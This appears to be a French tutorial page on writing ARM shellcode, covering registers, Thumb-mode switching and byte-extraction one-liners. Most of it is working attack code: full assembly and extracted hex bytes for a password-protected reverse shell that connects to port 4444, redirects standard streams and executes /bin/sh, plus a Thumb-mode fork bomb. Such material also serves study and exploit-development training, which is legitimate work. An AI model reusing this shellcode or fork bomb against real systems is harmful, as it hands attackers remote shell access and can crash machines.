ARM Shellcode writing

Image Not Showing Possible Reasons
The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported
Learn More →

author : A. Whitesmoke#3556, RistBS#3185

ARM Shellcode writing
- Shellcode Writing Basics

Shellcode Writing Basics

Ces notes décrirons certaines techniques comme, comment utiliser une structure en ARM pour un reverse shell ou encore un Password-Protected Reverse Shell. On c'est permis de pas donner énormément de détails car on éstime que ceux qui lise ça on de bonne bases en prog C et asm.

les registes:

R0-R10 : Registres généraux
R11 : Frame Pointer (FP)
R12 : Intra Procedural Call (IPC)
R13 : Stack Pointer (SP)
R14 : Link Register (LR)
R15 : Program Counter/Instruction Pointer (PC)

ARM possède 2 modes, le mode Thumb possèdes des instructions en 16 bits et le mode ARM possèdes des instructions en 32 bits.

pour switch en Thumb mode voilà ce qu'il faut faire :

 add r0, pc, #1
 bx  r0
// le code qui suivera sera en thumb mode

dans un premier temps on ajoute 1 à PC (Program Counter) puis on met le résultat dans r0. Pour la 2ème instruction on utilisera BX (Branch & Exchange) dans r0. si LSB=1 (bit de poid faible) alors on est en thumb mode.

plusieurs techniques existent pour parse un shellcode :

1 - utilisation de awk et utilisation de bash


for i in $(objdump -d hello | grep "^ "|awk -F"[\t]" '{print $2}'); do echo -n ${i:6:2}${i:4:2}${i:2:2}${i:0:2};done| sed 's/.\{2\}/\\x&/g'

2 - utilisation de regex pour le B16 + ajout des double quotes


objdump -d hello |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

3 - utilisation de hexdump et objcopy


objcopy -O binary fichier.bin fichier.dump && hexdump -v -e '"\\""x" 1/1 "%02x" ""' fichier.dump

Reverse Shell in ARM

voici comment faire une structure en ARM :

adr r1, _sockaddr @ sockaddr struct 
...

_sockaddr: 
 	.hword 2 @ sin_family 
 	.hword 0x5c11 // sin_port 4444
 	.word 0x100007f @ sin_addr 127.0.0.1
 	.byte 0,0,0,0,0,0,0,0 @ sin_zero

puis on utilise dup2() pour faire la redirection des sorties standards.

Password-Protected Reverse Shell


























































.section .text
.global _start
_start:

.arm
    add   r3, pc, #1
    bx    r3

.thumb

    mov   r0, #2
    mov   r1, #1
    eor   r2, r2
    mov   r7, #200
    add   r7, #81
    svc   #1
mov   r10, r0 
    adr   r1, target
    strb  r2, [r1, #1]
    strb  r2, [r1, #5]
    strb  r2, [r1, #6] 
    mov   r2, #16
    add   r7, #2  
    svc   #1
    push  {r1}
    mov   r1, sp
    mov   r2, #4
    mov   r7, #3
    .read_pass:
        mov   r0, r10
        svc   #1
    .check_pass:
        ldr   r3, pass
        ldr   r4, [r1]
        eor   r3, r3, r4
    bne .read_pass
    mov   r1, #2 
    mov   r7, #63    
    .loop_stdio:
        mov   r0, r10
        svc   #1
        sub   r1,#1
    bpl .loop_stdio
    adr   r0, command
    eor   r2, r2
    eor   r1, r1
    strb  r2, [r0, #7]
    mov   r7, #11 
    svc   #1

target:
    .ascii "\x02\xff"  
    .ascii "\x11\x5c"
    
    .byte 127,255,255,1 
    
command: .ascii "/bin/sh?"
pass: .ascii "RistBS=aker"

si vous le saviez pas, malgé que les registres de r0 à r10 sont des registres pour un usage général, le registre r7 est utilisé pour identifier les NR des syscall.

ces caractère ascii \x02\xff\x11\x5c montre que nous utilisons le proto TCP en IPv4 sur le port 4444 (port de skid).

Fonction .read_pass et .check_pass :

pour la fonction read on va juste utiliser la structure C : read(sourcefd, destbuffer, amount)

eor r3, r3, r4 = r3=r3^r4
bne .read_pass (Department if Not Equal) équivalement à JNE en x86. Cette instruction va jump à la lecture du mdp si c'est pas égal au premier args passé dans r1. (adresse de r1 récupéré et stocké dans r4)





as ARM-reverse-shell.s -o ARM-reverse-shell.o && ld -N ARM-reverse-shell.o -o ARM-reverse-shell && objcopy -O binary ARM-reverse-shell ARM-reverse-shell.dump && hexdump -v -e '"\\""x" 1/1 "%02x" ""' ARM-reverse-shell.dump

\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x82\x46\x0e\xa1\x4a
\x70\x4a\x71\x8a\x71\x10\x22\x02\x37\x01\xdf\x02\xb4\x69\x46\x04\x22\x03\x27\x50\x46\x01\xdf\x0b\x4b\x0c\x68\x63\x40\xf9\xd1\x02\x21\x3f\x27\x50\x46\x01\xdf\x01\x39\xfb\xd5\x04\xa0\x52\x40\x49\x40\xc2
\x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\x7f\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x3f\x53\x35\x39\x21

Source : https://github.com/alanvivona/pwnshop/blob/master/src/0x15-ARM-shellcode/ARM-reverse-shell-with-auth.s

Test Final : ForkBomb

NR	Syscall Name	%r7	arg0 (%r0)
2	fork	0x02	-

.text
.global .start

.start:
	.code 32   
	add r3, pc, #1	
	bx r3

	.code 16
	.loop:
		eor r7, r7 
		add r7, #2
		svc #1
		mov r8, r8
		bl .loop

Syntax	Example	Reference
# Header	Header	基本排版
- Unordered List	Unordered List
1. Ordered List	Ordered List
- [ ] Todo List	Todo List
> Blockquote	Blockquote
Bold font	Bold font
Italics font	Italics font
~~Strikethrough~~	~~Strikethrough~~
19^th^	19^th
H~2~O	H₂O
++Inserted text++	Inserted text
==Marked text==	Marked text
[link text](https:// "title")	Link
![image alt](https:// "title")	Image
`Code`	`Code`	在筆記中貼入程式碼
```javascript var i = 0; ```	`var i = 0;`	在筆記中貼入程式碼
:smile:		Emoji list
{%youtube youtube_id %}	Externals
$L^aT_eX$	L^aT_eX
:::info This is a alert area. :::	This is a alert area.